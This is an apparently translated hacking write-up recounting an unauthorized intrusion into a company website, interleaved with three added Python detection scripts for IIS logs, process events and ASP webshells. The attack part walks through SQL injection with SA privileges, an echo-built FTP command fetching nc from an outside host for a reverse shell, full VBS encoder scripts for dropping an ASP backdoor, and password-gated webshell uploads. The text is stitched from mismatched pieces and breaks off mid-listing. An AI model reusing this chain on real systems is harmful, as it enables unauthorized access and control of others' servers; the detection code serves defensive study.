Clever application of scripts

Source: Internet
Author: User

Today I saw an animation on the Internet showing how poor the security of those large companies is, so I decided to take a look. I entered "group" in GOOGLE, and on the first page there was a link to a company's website. I just clicked a link and added a single quotation mark:
http://www.xxx.com.cn/gushi.asp?pid=8&cid=111
Whoa, an error came back:
Microsoft VBScript compiler error 800a03f6
Expected 'End'
/IisHelp/common/500-100.asp, line 242
Microsoft OLE DB Provider for ODBC Drivers error 80040e14
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/Inc/artid.inc, line 8
The returned information shows that the backend is SQL Server.
Pinging www.xxx.com.cn returns the IP address 61.XX.XX.68. The website can be accessed directly through the IP address, which means it is an independent server.
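As an added defender-side example (not part of the original write-up), the following Python scans IIS W3C extended log lines for the probing seen above: a quote, comment sequence or tautology in the query string, and a 500 response, which is what tells the prober that the detailed ODBC error page reached the client. The log text, field list and IP addresses (documentation ranges) are constructed for this example.

```python
"""Scan IIS W3C extended log lines for SQL-injection probing.

Added example; the log below is constructed (documentation IP ranges),
not taken from the original write-up."""
import re
from urllib.parse import unquote_plus

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-03-01 10:00:01 203.0.113.10 GET /gushi.asp pid=8&cid=111 200
2005-03-01 10:00:05 203.0.113.10 GET /gushi.asp pid=8&cid=111%27 500
2005-03-01 10:00:09 203.0.113.10 GET /gushi.asp pid=8&cid=111%27;-- 500
2005-03-01 10:01:00 198.51.100.7 GET /index.asp - 200
2005-03-01 10:01:12 203.0.113.10 GET /gushi.asp pid=8'+and+1=1-- 500
"""

# Indicator name -> pattern applied to the URL-decoded query string.
INDICATORS = {
    "quote": re.compile(r"'"),
    "comment": re.compile(r"--|/\*"),
    "stacked": re.compile(r";"),
    "tautology": re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I),
    "union": re.compile(r"\bunion\b.+\bselect\b", re.I),
    "cmdshell": re.compile(r"xp_cmdshell", re.I),
}


def parse_w3c(text):
    """Yield one dict per data line, using the #Fields: directive as the header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        yield dict(zip(fields, parts))


def scan_iis_log(text):
    """Return one finding per request whose query string carries an injection indicator."""
    findings = []
    for rec in parse_w3c(text):
        raw = rec.get("cs-uri-query", "-")
        query = "" if raw == "-" else unquote_plus(raw)
        hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
        if not hits:
            continue
        findings.append({
            "c-ip": rec["c-ip"],
            "uri": rec["cs-uri-stem"] + ("?" + query if query else ""),
            "status": int(rec["sc-status"]),
            "indicators": hits,
            # A 500 right after a quote means the verbose ODBC error page reached the client.
            "error_leak": rec["sc-status"] == "500",
        })
    return findings


def by_client(findings, min_hits=2):
    """Group findings by client IP; repeated hits from one address are the probe worth triaging."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["c-ip"], []).append(f)
    return {ip: fs for ip, fs in grouped.items() if len(fs) >= min_hits}


if __name__ == "__main__":
    for ip, fs in by_client(scan_iis_log(SAMPLE_LOG)).items():
        print(ip, [f["uri"] for f in fs])
```

The status column matters as much as the quote: the 500 with the ODBC text in the body is what revealed the backend. Turning off detailed error pages and parameterising the query remove both signals, and the log rule still catches the probe itself.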
I'm interested. It seems to be a rich company. I checked this link with NBSI, and it turned out to be running with SA permissions!

I scanned the host's open ports with SUPERSCAN and found only ports 80 and 8080 open (both serve web services; it seems there is a firewall, as expected). In this case, adding a user and opening 3389 is meaningless. I had to look for clues again.
First, write an ftp.txt with echo and then execute ftp -s:ftp.txt to download nc, then run it through NBSI to connect back and get system permissions. But when I used ECHO to write the file, something went wrong: I entered one ECHO command and it was executed four times. I entered echo open ftp.eviloctal.com>e:\xxxweb\app\3.txt (e:\xxxweb is the root directory of the website), the line was written into the file four times, and I downloaded the file directly to confirm this.

(Note: when running commands with NBSI, I recommend not checking the "return results" option, because command execution then becomes very slow; instead use the redirection character ">" to send the command output into the web directory. For example, dir c: can be written as dir c:>e:\xxxweb\app\1.txt, which is fast, and the result is then viewed in the browser at http://www.xxx.com.cn/app/1.txt (e:\xxxweb is the root directory of the website).)
It would be nice to echo the one-line webshell (the server side) into the WEB directory, but the % in it was filtered out no matter what. Escaping with ^ works when echo is run locally, but however I ran it through NBSI the % in the generated file was filtered out, and the content became:

In this case there was no way to write the one-line ASP backdoor to the server directly (it was again written four times, for the same reason as above). So I thought of writing a VBS script and passing the content to be written as a parameter, letting the script generate the corresponding file.
The file-writing script writefile.vbs (command format: cscript writefile.vbs "string to be written" targetfile) contains:
On error resume next: x = 1:
str = replace(Wscript.Arguments(0), "=", vbcrlf):    'replace = with the carriage return
str = replace(str, "**", """"):                      'replace ** with the symbol "
str = replace(str, "--", chr(38)):                   'replace -- with the symbol &
str = replace(str, "@", chr(37)):                    'replace @ with the symbol %
Set fso = CreateObject("Scripting.FileSystemObject"):
Set a = fso.CreateTextFile(Wscript.Arguments(1), true):    'create the file; its name is the second parameter given at execution
If x = 1 then a.Write(str): x = 2: set fso = nothing: set a = nothing:
This file must be written to xxx.vbe or xxx.vbs on the server with the ECHO command; the VBS is then used to write the file we want. (As in the example above, characters such as ", %, & and the carriage return cannot be passed directly to the script as parameters, so they are replaced; the script trans.vbs below performs the reverse conversion.)
A brief explanation: the first statement is the most important; this error-handling statement keeps the program running whatever error occurs later. The second is the IF statement: a flag stops duplicated statements from writing the same content to the file repeatedly. If x = 1 the file is written, and after writing x is set to 2. Next, you may wonder why a colon is added after every statement: it is because I considered that if the same statement appears several times on one line, the program should still run. For example, this line still executes when duplicated:
str = replace(Wscript.Arguments(0), "=", vbcrlf): str = replace(Wscript.Arguments(0), "=", vbcrlf):
If the line were instead written as
str = replace(Wscript.Arguments(0), "=", vbcrlf)
then when the same statement is repeated on one line it becomes
str = replace(Wscript.Arguments(0), "=", vbcrlf) str = replace(Wscript.Arguments(0), "=", vbcrlf)
and the program can no longer run.
The characters ", %, & and the carriage return cannot be passed directly to the script as parameters. It is easy to see that the carriage return is replaced with =, the double quotation mark with **, & with -- and % with @. Before writing a file, you must first convert the file you want to write into the format writefile.vbs accepts, using the following script trans.vbs (command format: cscript trans.vbs sourcefile targetfile):
On error resume next
If Wscript.Arguments.count <> 2 then
    Wscript.echo "Incorrect parameter format: cscript trans.vbs sourcefile targetfile"
    Wscript.quit
End if
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(Wscript.Arguments(0))
str = a.ReadAll
str = replace(str, """", "**")     'replace double quotation marks with **
str = replace(str, vbcrlf, "=")    'replace the carriage return with =
str = replace(str, "&", "--")      'replace & with --
str = replace(str, "%", "@")       'replace % with @
Wscript.echo str
Set a = fso.CreateTextFile(Wscript.Arguments(1), True)
a.Write(str)
Run cscript trans.vbs one.txt onetrans.txt locally. In this example, one.txt contains the backdoor content, and after conversion the converted content is saved in onetrans.txt.
The ECHO commands for writing writefile.vbs are:
echo on error resume next: x = 1:>writefile.vbe
echo str = replace(Wscript.Arguments(0), "=", vbcrlf):>>writefile.vbe
echo str = replace(str, "**", """"):>>writefile.vbe
echo str = replace(str, "--", chr(38)):>>writefile.vbe
echo str = replace(str, "@", chr(37)):>>writefile.vbe
echo Set fso = CreateObject("Scripting.FileSystemObject"):>>writefile.vbe
echo Set a = fso.CreateTextFile(Wscript.Arguments(1), true):>>writefile.vbe
echo if x = 1 then a.Write(str): x = 2: set fso = nothing: set a = nothing:>>writefile.vbe
Execute the above commands one by one in NBSI's NB Commander to write them into a file writefile.vbe in the other side's system directory; then the one-line server backdoor can be written into the other side's WEB directory! Command:
cscript writefile.vbe "" d:\web\app\1.asp (note: when the parameter passed to the script contains spaces, it must be enclosed in double quotation marks!)
Corresponding address: http://www.xxx.com.cn/app/1.asp
Point the form action of post.htm to this address, and we can upload our Trojan horse to the server!
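The chain above (an echo redirect into the web root, an ftp -s: transfer, a .vbe dropped with echo and then run with cscript) is easy to spot in process-creation telemetry. The following Python is added here as a defender-side example and is not part of the original post: it correlates constructed Sysmon-style process events, remembering files dropped by echo redirection and flagging a later script-host launch of one of them. The web root path, the assumption that the SQL Server service process never legitimately spawns cmd.exe (commands issued through NBSI would run as its children), and every event's contents are constructed for the example.

```python
"""Correlate process-creation events to spot the echo-dropped-script pattern.

Added example; events, paths and rule names are constructed, not from the page."""
import re

WEB_ROOTS = (r"e:\xxxweb",)                   # assumption: the site's document root
DB_ENGINES = ("sqlservr.exe",)                # assumption: the DB service should never spawn a shell
SCRIPT_HOSTS = ("cscript.exe", "wscript.exe")
DROPPABLE = (".vbe", ".vbs", ".asp", ".bat")  # extensions worth remembering when written by echo

REDIRECT_RX = re.compile(r'>{1,2}\s*([A-Za-z]:\\[^\s&|"]+)')   # target of > or >>
WIN_PATH_RX = re.compile(r'[A-Za-z]:\\[^\s"]+')                 # any absolute Windows path
FTP_SCRIPT_RX = re.compile(r"\bftp(?:\.exe)?\b.*\s-s:", re.I)   # scripted ftp transfer


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def under_web_root(path):
    return any(path.lower().startswith(r.lower()) for r in WEB_ROOTS)


class Detector:
    """Stateful: remembers files dropped via echo so a later script-host
    launch of that file can be tied back to the drop."""

    def __init__(self):
        self.dropped = set()

    def classify(self, ev):
        """Return the rule names one event triggers, in evaluation order."""
        hits = []
        cmd = ev["cmdline"]
        image, parent = basename(ev["image"]), basename(ev["parent"])
        if parent in DB_ENGINES and image == "cmd.exe":
            hits.append("shell_spawned_by_db_engine")
        for target in REDIRECT_RX.findall(cmd):
            if under_web_root(target):
                hits.append("echo_redirect_into_webroot")
            if target.lower().endswith(DROPPABLE):
                hits.append("script_file_dropped_by_echo")
                self.dropped.add(target.lower())
        if FTP_SCRIPT_RX.search(cmd):
            hits.append("ftp_scripted_transfer")
        if image in SCRIPT_HOSTS:
            paths = [p.lower() for p in WIN_PATH_RX.findall(cmd)]
            if any(p in self.dropped for p in paths):
                hits.append("dropped_script_executed")
            if any(under_web_root(p) for p in paths):
                hits.append("script_host_touching_webroot")
        return hits


def run(events):
    """Classify events in time order; returns [(event id, [rule names]), ...]."""
    det = Detector()
    return [(ev["id"], det.classify(ev)) for ev in events]


# Constructed events in time order (the first three model commands issued via the DB engine).
SQL = r"C:\PROGRA~1\MICROS~1\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\WINNT\system32\cmd.exe"
EVENTS = [
    {"id": 1, "parent": SQL, "image": CMD,
     "cmdline": r"cmd.exe /c echo open ftp.example.invalid>e:\xxxweb\app\3.txt"},
    {"id": 2, "parent": SQL, "image": CMD,
     "cmdline": r"cmd.exe /c ftp -s:e:\xxxweb\app\3.txt"},
    {"id": 3, "parent": SQL, "image": CMD,
     "cmdline": r"cmd.exe /c echo on error resume next: x = 1:>c:\winnt\system32\writefile.vbe"},
    {"id": 4, "parent": CMD, "image": r"C:\WINNT\system32\cscript.exe",
     "cmdline": r'cscript c:\winnt\system32\writefile.vbe "x = 1" e:\xxxweb\app\1.asp'},
    {"id": 5, "parent": r"C:\WINNT\explorer.exe", "image": CMD, "cmdline": "cmd.exe /c dir c:\\"},
    {"id": 6, "parent": r"C:\WINNT\system32\services.exe", "image": r"C:\WINNT\system32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for event_id, rules in run(EVENTS):
        print(event_id, rules or "-")
```

The parent-image rule is the highest-value check: everything in the write-up is executed through the database service, so one rule on sqlservr.exe spawning cmd.exe covers the whole chain regardless of what is echoed, and the correlation rules add the context needed to scope the cleanup (which files were dropped, and whether they ran).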

Open post.htm, paste the file-saving ASP Trojan into the text box below and click upload. When you are redirected to the EST forum, the ASP Trojan has been uploaded successfully!
I smoothly uploaded the file-saving Trojan to the server and named it advv.asp.

I added verification to this Trojan, so it must be accessed through this URL:
http://www.xxx.com.cn/app/advv.asp?id=haicao (an empty page is displayed if the parameter id=haicao is not added)
To implement the password check, you only need to add the following statement at the top of the ASP file; the password haicao can be changed as you like.
Use the file-saving Trojan (the file uploaded here is advv.asp) to upload cmd.asp (also with the haicao password check added).
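The uploaded advv.asp and cmd.asp are classic one-file ASP shells: a request parameter fed into FileSystemObject or WScript.Shell, gated by a parameter compare such as id=haicao that otherwise returns an empty page. As an added example (not from the original post), the Python below scores ASP source for those combinations and also flags the concatenated-SQL pattern that opened this write-up. The four ASP snippets are constructed for the example, and the rule weights and threshold are the example's own.

```python
"""Score ASP source for webshell-style constructs and SQL concatenation.

Added example; the ASP snippets and rule weights are constructed for it."""
import re

# (name, weight, pattern); weights are this example's own choice.
RULES = [
    ("eval_or_execute_on_request", 10,
     re.compile(r"\b(?:eval|execute(?:global)?)\s*\(?\s*request\b", re.I)),
    ("shell_object", 6, re.compile(r'createobject\s*\(\s*"w?script\.shell"', re.I)),
    ("shell_exec", 6, re.compile(r"\.exec\s*\(", re.I)),
    ("filesystem_object", 4,
     re.compile(r'createobject\s*\(\s*"scripting\.filesystemobject"', re.I)),
    ("file_write", 4, re.compile(r"\.(?:createtextfile|opentextfile)\s*\(", re.I)),
    # if request("x")<>"secret" then response.end : the empty-page password gate
    ("password_gate", 3,
     re.compile(r'if\s+request(?:\.(?:form|querystring))?\s*\(\s*"\w+"\s*\)\s*<>\s*"[^"]*"'
                r"\s*then\s*response\.end", re.I)),
    ("request_fed", 2, re.compile(r"\brequest(?:\.(?:form|querystring))?\s*\(", re.I)),
    # Weight 0: not a shell, but the injection pattern that started the write-up.
    ("sql_concat", 0,
     re.compile(r'\b(?:select|insert|update|delete)\b[^\n]*"\s*&\s*request\b', re.I)),
]
THRESHOLD = 8


def score_asp(src):
    """Return (score, [rule names]) for one ASP source text."""
    hits = [name for name, _, rx in RULES if rx.search(src)]
    score = sum(w for name, w, _ in RULES if name in hits)
    # Attacker-controlled input reaching a file write or a shell is the defining combination.
    if "request_fed" in hits and ({"file_write", "shell_exec"} & set(hits)):
        score += 5
    return score, hits


def verdict(src):
    score, hits = score_asp(src)
    if score >= THRESHOLD:
        return "webshell-like"
    if "sql_concat" in hits:
        return "injection-prone"
    return "clean"


def classify(files):
    """files: {name: source}; returns {name: verdict}."""
    return {name: verdict(src) for name, src in files.items()}


# Constructed ASP snippets: two shells, one injection-prone page, one harmless page.
SAMPLES = {
    "advv.asp": ('<%if request("id")<>"secret" then response.end\n'
                 'set fso=createobject("scripting.filesystemobject")\n'
                 'set f=fso.createtextfile(request.form("p"),true)\n'
                 'f.write request.form("c")%>'),
    "cmd.asp": ('<%set sh=createobject("wscript.shell")\n'
                'set r=sh.exec("cmd /c " & request("c"))\n'
                'response.write r.stdout.readall%>'),
    "gushi.asp": ('<%set cn=server.createobject("adodb.connection")\n'
                  'rs.open "select * from art where pid=" & request("pid"), cn\n'
                  'response.write rs("title")%>'),
    "about.asp": '<%response.write "About us"%>',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, score_asp(src), verdict(src))
```

Run it over the web root on a schedule or on every file-create event in the web directory: a new .asp scoring above the threshold is the immediate response trigger, while "injection-prone" results are the remediation backlog that removes the entry point in the first place.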
Then upload the process-listing script, saved as list2.vbe:
Wscript.echo "PID ProcessName"
For each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
    Wscript.echo ps.ProcessId & " " & ps.Name
Next
Run it as cscript list2.vbe > e:\xxxweb\app\1.txt and view the result in IE at /app/1.txt, as in the note above:
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
PID ProcessName
0 System Idle Process
8 System
160 SMSS.EXE
184 CSRSS.EXE
204 WINLOGON.EXE
232 SERVICES.EXE
244 LSASS.EXE
448 svchost.exe
480 spoolsv.exe
508 msdtc.exe
624 svchost.e
